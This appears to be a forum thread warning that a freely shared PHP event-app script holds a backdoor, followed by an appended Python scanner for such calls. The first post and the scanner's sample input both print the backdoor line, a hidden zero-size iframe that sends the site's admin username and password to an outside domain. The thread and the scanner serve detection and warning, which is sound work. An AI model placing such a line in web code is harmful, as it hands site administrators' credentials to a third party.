[WARNING] Backdoor script was posted/shared here, members beware!

Discussion in 'The Shit List' started by indianbill007, Apr 5, 2011.

  1. indianbill007

    This is a warning to all those who downloaded this script, shared by someone here:

    Infraction Viral Event App

    With file name

    Infraction Viral Event App.zip

    A fellow BHW member passed me a copy today and I had a look in the code and I found the code had a backdoor.

    On line number 155, in edit.php file.

    Code:
    <iframe src="http://facecatch.info/index.php?adminu=<?php echo urlencode($adminu); ?>&adminp=<?php echo urlencode($adminp); ?>&url=<?php echo "http://" . $_SERVER['HTTP_HOST']  . $_SERVER['REQUEST_URI'];?>" width="0" height="0" frameborder="0">
    So whoever owns this domain has access to all the admin panels of the script on all servers it was installed on.

    He is pawning on your hard work, so before he causes you more damage just delete the script if you have installed it and get it investigated by an expert before using it.

    And learn your lesson that no one will give you free gold free of cost. The event app is a hot gold mine now, so don't fall into any trap and install anything you get and open backdoors on your servers.

    Take Care Guys,
    IndianBill007

    PS: Apparently this file comes from this forum - http://*******VIP.COM
    as per the note in the files.
     
  2. sercon

    Thank you for the heads-up!
     
  3. roamer

    Thanks for the heads up. I never use anything like this unless I check it thoroughly; I downloaded this to test it later locally, so now I'll triple check its behavior. I hope more people see this warning.
     
  4. Stoner47

    That's what you get for free shared shit! I got a hold of this one and showed it to IndianBill and he immediately found the threat. Not worth buying $50 scripts you guys, even free (it's not going to work). Stop wasting your time with this shit. Spend some money and get some quality support and something that works!
     
  5. angelas111

    Thanks indianbill. Any tips on how to scan scripts for that kind of stuff?
     
  6. indianbill007

    Hi Angelas,

    Yes, the best way to scan such scripts is to install them locally and see if they are making calls to any backdoor server/domain.

    I use this handy free tool:

    https://addons.mozilla.org/en-US/firefox/addon/httpfox/

    Make sure you close all your other browser windows so you don't get confused.

    When you are inspecting, simply launch 1 browser window with the script in question, and open httpfox. If you don't see any calls made outside localhost, the script is clean.

    However, if you see it calling anything outside localhost, it's backdoored.

    Hope this helps.

    I will post a step by step guide to scan scripts tomorrow maybe.
     
    Last edited: Apr 5, 2011
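
A static complement to the local test described in the thread, as an added example that is not part of any post: it lists every hard-coded URL in a source file whose host is not allow-listed, and marks the ones that interpolate credential-like PHP variables or sit in a zero-size element, whether or not that page is ever rendered in the browser. The function name `scan_source`, the allow-list and the keyword list are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"localhost", "127.0.0.1"}  # assumption: script is tested locally

URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.I)
# First PHP variable inside each <?php ... ?> or <?= ... ?> tag.
PHP_VAR_RE = re.compile(r"<\?(?:php|=)[^?]*?\$(\w+)", re.I)
SENSITIVE_RE = re.compile(r"pass|pwd|admin|user|token|secret|key", re.I)
HIDDEN_RE = re.compile(r"""(?:width|height)\s*=\s*["']?0\b|display\s*:\s*none""", re.I)


def scan_source(text, allowed=ALLOWED_HOSTS):
    """Return one finding per hard-coded URL whose host is not allow-listed."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in URL_RE.finditer(line):
            host = (urlsplit(m.group()).hostname or "").lower()
            if not host or host in allowed:
                continue
            # Variables interpolated into the line from the URL onwards.
            php_vars = PHP_VAR_RE.findall(line[m.start():])
            findings.append({
                "line": lineno,
                "host": host,
                "vars": php_vars,
                "sends_secrets": any(SENSITIVE_RE.search(v) for v in php_vars),
                "hidden": bool(HIDDEN_RE.search(line)),
            })
    return findings


# Sample input: line 2 is the iframe quoted in the first post; lines 1 and 3 are constructed.
SAMPLE = r'''<form action="http://localhost/app/edit.php" method="post">
<iframe src="http://facecatch.info/index.php?adminu=<?php echo urlencode($adminu); ?>&adminp=<?php echo urlencode($adminp); ?>&url=<?php echo "http://" . $_SERVER['HTTP_HOST']  . $_SERVER['REQUEST_URI'];?>" width="0" height="0" frameborder="0">
<a href="https://example.org/docs">Documentation</a>
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE):
        flag = "HIGH" if f["sends_secrets"] and f["hidden"] else "review"
        print(f"{flag}: line {f['line']} -> {f['host']} vars={f['vars']} hidden={f['hidden']}")
```

A finding marked only "review" (the constructed documentation link here) is an external reference to check by hand, not proof of a backdoor.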